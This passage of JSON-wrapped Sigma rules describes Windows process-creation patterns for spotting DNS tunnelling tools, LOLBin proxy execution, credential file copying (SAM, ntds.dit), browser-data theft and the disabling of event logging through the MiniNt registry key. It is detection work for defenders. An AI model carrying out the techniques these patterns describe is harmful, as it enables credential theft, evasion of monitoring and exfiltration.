    "content": "title: Dllhost.EXE Execution Anomaly\nid: e7888eb1-13b0-4616-bd99-4bc0c2b054b9\nstatus: test\ndescription: Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.\nreferences:\n    - https://redcanary.com/blog/child-processes/\n    - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-27\nmodified: 2023-05-15\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dllhost.exe'\n        CommandLine:\n            - 'dllhost.exe'\n            - 'dllhost'\n    filter_main_null:\n        CommandLine: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml",
    "content": "title: DNS Exfiltration and Tunneling Tools Execution\nid: 98a96a5a-64a0-4c42-92c5-489da3866cb0\nstatus: test\ndescription: Well-known DNS Exfiltration tools execution\nreferences:\n    - https://github.com/iagox86/dnscat2\n    - https://github.com/yarrick/iodine\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.exfiltration\n    - attack.t1048.001\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.t1132.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\iodine.exe'\n        - Image|contains: '\\dnscat2'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml",
    "content": "title: Unusual Child Process of dns.exe\nid: a4e3d776-f12e-42c2-8510-9e6ed1f43ec3\nstatus: test\ndescription: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\nmodified: 2023-02-05\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\dns.exe'\n    filter:\n        Image|endswith: '\\conhost.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml",
    "content": "title: Potential Discovery Activity Via Dnscmd.EXE\nid: b6457d63-d2a2-4e29-859d-4e7affc153d1\nstatus: test\ndescription: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\n    - https://learn.microsoft.com/en-us/azure/dns/dns-zones-records\n    - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/\nauthor: '@gott_cyber'\ndate: 2022-07-31\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\dnscmd.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '/enumrecords'\n            - '/enumzones'\n            - '/ZonePrint'\n            - '/info'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml",
    "content": "title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE\nid: f63b56ee-3f79-4b8a-97fb-5c48007e8573\nrelated:\n    - id: e61e8a88-59a9-451c-874e-70fcc9740d67\n      type: derived\n    - id: cbe51394-cd93-4473-b555-edf0144952d9\n      type: derived\nstatus: test\ndescription: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)\nreferences:\n    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\n    - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-08\nmodified: 2023-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dnscmd.exe'\n        CommandLine|contains|all:\n            - '/config'\n            - '/serverlevelplugindll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dnx_execute_csharp_code.yml",
    "content": "title: Potential Application Whitelisting Bypass via Dnx.EXE\nid: 81ebd28b-9607-4478-bf06-974ed9d53ed7\nstatus: test\ndescription: |\n    Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.\n    Attackers might abuse this in order to bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/\n    - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/\nauthor: Beyu Denis, oscd.community\ndate: 2019-10-26\nmodified: 2024-04-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dnx.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of dnx.exe by legitimate user\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml",
    "content": "title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE\nid: d80d5c81-04ba-45b4-84e4-92eba40e0ad3\nstatus: test\ndescription: Detects execution of arbitrary DLLs or unsigned code via a \".csproj\" files via Dotnet.EXE.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/\n    - https://twitter.com/_felamos/status/1204705548668555264\n    - https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/\nauthor: Beyu Denis, oscd.community\ndate: 2020-10-18\nmodified: 2025-10-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dotnet.exe'\n        - OriginalFileName: '.NET Host'\n    selection_cli:\n        CommandLine|endswith:\n            - '.csproj'\n            - '.csproj\"'\n            - '.dll'\n            - '.dll\"'\n            - \".csproj'\"\n            - \".dll'\"\n    filter_optional_notepadplus_plus:\n        ParentImage:\n            - 'C:\\Program Files (x86)\\Notepad++\\notepad++.exe'\n            - 'C:\\Program Files\\Notepad++\\notepad++.exe'\n        CommandLine|contains|all:\n            - 'C:\\ProgramData\\CSScriptNpp\\'\n            - '-cscs_path:'\n            - '\\cs-script\\cscs.dll'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administrator usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml",
    "content": "title: Binary Proxy Execution Via Dotnet-Trace.EXE\nid: 9257c05b-4a4a-48e5-a670-b7b073cf401b\nstatus: test\ndescription: Detects commandline arguments for executing a child process via dotnet-trace.exe\nreferences:\n    - https://twitter.com/bohops/status/1740022869198037480\nauthor: Jimmy Bayne (@bohops)\ndate: 2024-01-02\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dotnet-trace.exe'\n        - OriginalFileName: 'dotnet-trace.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-- '\n            - 'collect'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the utility in order to debug and trace a program.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dotnetdump_memory_dump.yml",
    "content": "title: Process Memory Dump Via Dotnet-Dump\nid: 53d8d3e1-ca33-4012-adf3-e05a4d652e34\nstatus: test\ndescription: |\n    Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS.\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect\n    - https://twitter.com/bohops/status/1635288066909966338\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dotnet-dump.exe'\n        - OriginalFileName: 'dotnet-dump.dll'\n    selection_cli:\n        CommandLine|contains: 'collect'\n    condition: all of selection_*\nfalsepositives:\n    - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_driverquery_recon.yml",
    "content": "title: Potential Recon Activity Using DriverQuery.EXE\nid: 9fc3072c-dc8f-4bf7-b231-18950000fadd\nrelated:\n    - id: a20def93-0709-4eae-9bd2-31206e21e6b2\n      type: similar\nstatus: test\ndescription: Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers\nreferences:\n    - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\n    - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/\n    - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-19\nmodified: 2023-09-29\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: 'driverquery.exe'\n        - OriginalFileName: 'drvqry.exe'\n    selection_parent:\n        - ParentImage|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - ParentImage|contains:\n              - '\\AppData\\Local\\'\n              - '\\Users\\Public\\'\n              - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage by some scripts might trigger this as well\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_driverquery_usage.yml",
    "content": "title: DriverQuery.EXE Execution\nid: a20def93-0709-4eae-9bd2-31206e21e6b2\nrelated:\n    - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd\n      type: similar\nstatus: test\ndescription: Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers\nreferences:\n    - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\n    - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/\n    - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-19\nmodified: 2023-09-29\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: 'driverquery.exe'\n        - OriginalFileName: 'drvqry.exe'\n    filter_main_other: # These are covered in 9fc3072c-dc8f-4bf7-b231-18950000fadd to avoid duplicate alerting\n        - ParentImage|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - ParentImage|contains:\n              - '\\AppData\\Local\\'\n              - '\\Users\\Public\\'\n              - '\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use by third party tools in order to investigate installed drivers\nlevel: medium # Level could be reduced to low if this utility is often used in your environment\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml",
    "content": "title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE\nid: 01c42d3c-242d-4655-85b2-34f1739632f7\nstatus: test\ndescription: Detects usage of Dsacls to grant over permissive permissions\nreferences:\n    - https://ss64.com/nt/dsacls.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dsacls.exe'\n        - OriginalFileName: \"DSACLS.EXE\"\n    selection_flag:\n        CommandLine|contains: ' /G '\n    selection_permissions:\n        CommandLine|contains: # Add more permissions as you see fit in your environment\n            - 'GR'\n            - 'GE'\n            - 'GW'\n            - 'GA'\n            - 'WP'\n            - 'WD'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrators granting over permissive permissions to users\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml",
    "content": "title: Potential Password Spraying Attempt Using Dsacls.EXE\nid: bac9fb54-2da7-44e9-988f-11e9a5edbc0c\nstatus: test\ndescription: Detects possible password spraying attempts using Dsacls\nreferences:\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone\n    - https://ss64.com/nt/dsacls.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dsacls.exe'\n        - OriginalFileName: \"DSACLS.EXE\"\n    selection_cli:\n        CommandLine|contains|all:\n            - '/user:'\n            - '/passwd:'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use of dsacls to bind to an LDAP session\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml",
    "content": "title: Domain Trust Discovery Via Dsquery\nid: 3bad990e-4848-4a78-9530-b427d854aac0\nrelated:\n    - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b\n      type: similar\n    - id: 77815820-246c-47b8-9741-e0def3f57308\n      type: obsolete\nstatus: test\ndescription: Detects execution of \"dsquery.exe\" for domain trust discovery\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md\n    - https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843\nauthor: E.M. Anhaus, Tony Lambert, oscd.community, omkar72\ndate: 2019-10-24\nmodified: 2023-02-02\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dsquery.exe'\n        - OriginalFileName: 'dsquery.exe'\n    selection_cli:\n        CommandLine|contains: 'trustedDomain'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the utilities by legitimate user for legitimate reason\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - Discover domain trusts with dsquery\n      technique: T1482\n      atomic_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml",
    "content": "title: Suspicious Kernel Dump Using Dtrace\nid: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795\nstatus: test\ndescription: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1\nreferences:\n    - https://twitter.com/0gtweet/status/1474899714290208777?s=12\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-28\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_plain:\n        Image|endswith: '\\dtrace.exe'\n        CommandLine|contains: 'lkd(0)'\n    selection_obfuscated:\n        CommandLine|contains|all:\n            - 'syscall:::return'\n            - 'lkd('\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dump64_defender_av_bypass_rename.yml",
    "content": "title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename\nid: 129966c9-de17-4334-a123-8b58172e664d\nstatus: test\ndescription: |\n    Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.\n    Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.\nreferences:\n    - https://twitter.com/mrd0x/status/1460597833917251595\nauthor: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-26\nmodified: 2024-06-21\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_dump:\n        Image|startswith: ':\\Program Files'\n        Image|contains: '\\Microsoft Visual Studio\\'\n        Image|endswith: '\\dump64.exe'\n    selection_tools_procdump:\n        - OriginalFileName: 'procdump'\n        - CommandLine|contains:\n              - ' -ma ' # Full Dump\n              - ' -mp ' # Mini Plus\n    condition: selection_dump and 1 of selection_tools_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml",
    "content": "title: DumpMinitool Execution\nid: dee0a7a3-f200-4112-a99b-952196d81e42\nstatus: test\ndescription: Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"\nreferences:\n    - https://twitter.com/mrd0x/status/1511415432888131586\n    - https://twitter.com/mrd0x/status/1511489821247684615\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/\n    - https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-04-06\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\DumpMinitool.exe'\n              - '\\DumpMinitool.x86.exe'\n              - '\\DumpMinitool.arm64.exe'\n        - OriginalFileName:\n              - 'DumpMinitool.exe'\n              - 'DumpMinitool.x86.exe'\n              - 'DumpMinitool.arm64.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' Full'\n            - ' Mini'\n            - ' WithHeap'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml",
    "content": "title: Suspicious DumpMinitool Execution\nid: eb1c4225-1c23-4241-8dd4-051389fde4ce\nstatus: test\ndescription: Detects suspicious ways to use the \"DumpMinitool.exe\" binary\nreferences:\n    - https://twitter.com/mrd0x/status/1511415432888131586\n    - https://twitter.com/mrd0x/status/1511489821247684615\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-06\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1036\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\DumpMinitool.exe'\n              - '\\DumpMinitool.x86.exe'\n              - '\\DumpMinitool.arm64.exe'\n        - OriginalFileName:\n              - 'DumpMinitool.exe'\n              - 'DumpMinitool.x86.exe'\n              - 'DumpMinitool.arm64.exe'\n    filter_folder:\n        Image|contains:\n            - '\\Microsoft Visual Studio\\'\n            - '\\Extensions\\'  # https://github.com/microsoft/vstest/blob/b2e2126f1aa7e5753cafe9515563c99ade6a59ce/src/package/nuspec/Microsoft.TestPlatform.Portable.nuspec#L159\n    susp_flags:\n        CommandLine|contains: '.txt'\n    cmd_has_flags:\n        CommandLine|contains:\n            - ' Full'\n            - ' Mini'\n            - ' WithHeap'\n    filter_cmd_misses_flags:\n        CommandLine|contains: '--dumpType'\n    condition: selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags and not filter_cmd_misses_flags ) )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dxcap_arbitrary_binary_execution.yml",
    "content": "title: New Capture Session Launched Via DXCap.EXE\nid: 60f16a96-db70-42eb-8f76-16763e333590\nstatus: test\ndescription: |\n    Detects the execution of \"DXCap.EXE\" with the \"-c\" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/\n    - https://twitter.com/harr0ey/status/992008180904419328\nauthor: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-26\nmodified: 2022-06-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\DXCap.exe'\n        - OriginalFileName: 'DXCap.exe'\n    selection_cli:\n        CommandLine|contains: ' -c ' # The \".exe\" is not required to run the binary\n    condition: all of selection*\nfalsepositives:\n    - Legitimate execution of dxcap.exe by legitimate user\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_esentutl_params.yml",
    "content": "title: Esentutl Gather Credentials\nid: 7df1713a-1a5b-4a4b-a071-dc83b144a101\nstatus: test\ndescription: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816\n    - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/\nauthor: sam0x90\ndate: 2021-08-06\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1003.003\n    - attack.s0404\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'esentutl'\n            - ' /p'\n    condition: selection\nfalsepositives:\n    - To be determined\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml",
    "content": "title: Copying Sensitive Files with Credential Data\nid: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f\nstatus: test\ndescription: Files with well-known filenames (sensitive files with credential data) copying\nreferences:\n    - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml\nauthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-22\nmodified: 2024-06-04\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.003\n    - car.2013-07-001\n    - attack.s0404\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_esent_img:\n        - Image|endswith: '\\esentutl.exe'\n        - OriginalFileName: '\\esentutl.exe'\n    selection_esent_cli:\n        CommandLine|contains|windash:\n            - 'vss'\n            - ' /m '\n            - ' /y '\n    selection_susp_paths:\n        CommandLine|contains:\n            - '\\config\\RegBack\\sam'\n            - '\\config\\RegBack\\security'\n            - '\\config\\RegBack\\system'\n            - '\\config\\sam'\n            - '\\config\\security'\n            - '\\config\\system '        # space needed to avoid false positives with \\config\\systemprofile\\\n            - '\\repair\\sam'\n            - '\\repair\\security'\n            - '\\repair\\system'\n            - '\\windows\\ntds\\ntds.dit'\n    condition: all of selection_esent_* or selection_susp_paths\nfalsepositives:\n    - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml",
    "content": "title: Esentutl Steals Browser Information\nid: 6a69f62d-ce75-4b57-8dce-6351eb55b362\nstatus: test\ndescription: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe\nreferences:\n    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n    - https://redcanary.com/threat-detection-report/threats/qbot/\n    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\nauthor: frack113\ndate: 2022-02-13\nmodified: 2024-03-05\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\esentutl.exe'\n        - OriginalFileName: 'esentutl.exe'\n    selection_flag:\n        CommandLine|contains|windash: '-r'\n    selection_webcache:\n        CommandLine|contains: '\\Windows\\WebCache'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_event_logging_disable_via_key_minint.yml",
    "content": "title: Security Event Logging Disabled via MiniNt Registry Key - Process\nid: 1a4bd6af-99ac-4466-b5b2-7b72b4a05462\nrelated:\n    - id: 8839e550-52d7-4958-9f2f-e13c1e736838 # Disable Security Events Logging Adding Reg Key MiniNt - Registry Set\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable security event logging by adding the `MiniNt` registry key.\n    This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.\n    Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.\nreferences:\n    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.002\n    - attack.t1112\n    - car.2022-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg_img:\n        # Example: reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt\"\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_cmd:\n        CommandLine|contains|all:\n            - ' add '\n            - '\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n    selection_powershell_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\powershell_ise.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_powershell_cmd1:\n        CommandLine|contains:\n            - 'New-Item '\n            - 'ni '\n    selection_powershell_cmd2:\n        CommandLine|contains: '\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n    condition: all of selection_reg_* or all of selection_powershell_*\nfalsepositives:\n    - Highly Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml",
    "content": "title: Potentially Suspicious Event Viewer Child Process\nid: be344333-921d-4c4d-8bb8-e584cf584780\nrelated:\n    - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6\n      type: derived\nstatus: test\ndescription: Detects uncommon or suspicious child processes of \"eventvwr.exe\" which might indicate a UAC bypass attempt\nreferences:\n    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n    - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2023-09-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\eventvwr.exe'\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\System32\\mmc.exe'\n            - ':\\Windows\\System32\\WerFault.exe'\n            - ':\\Windows\\SysWOW64\\WerFault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml",
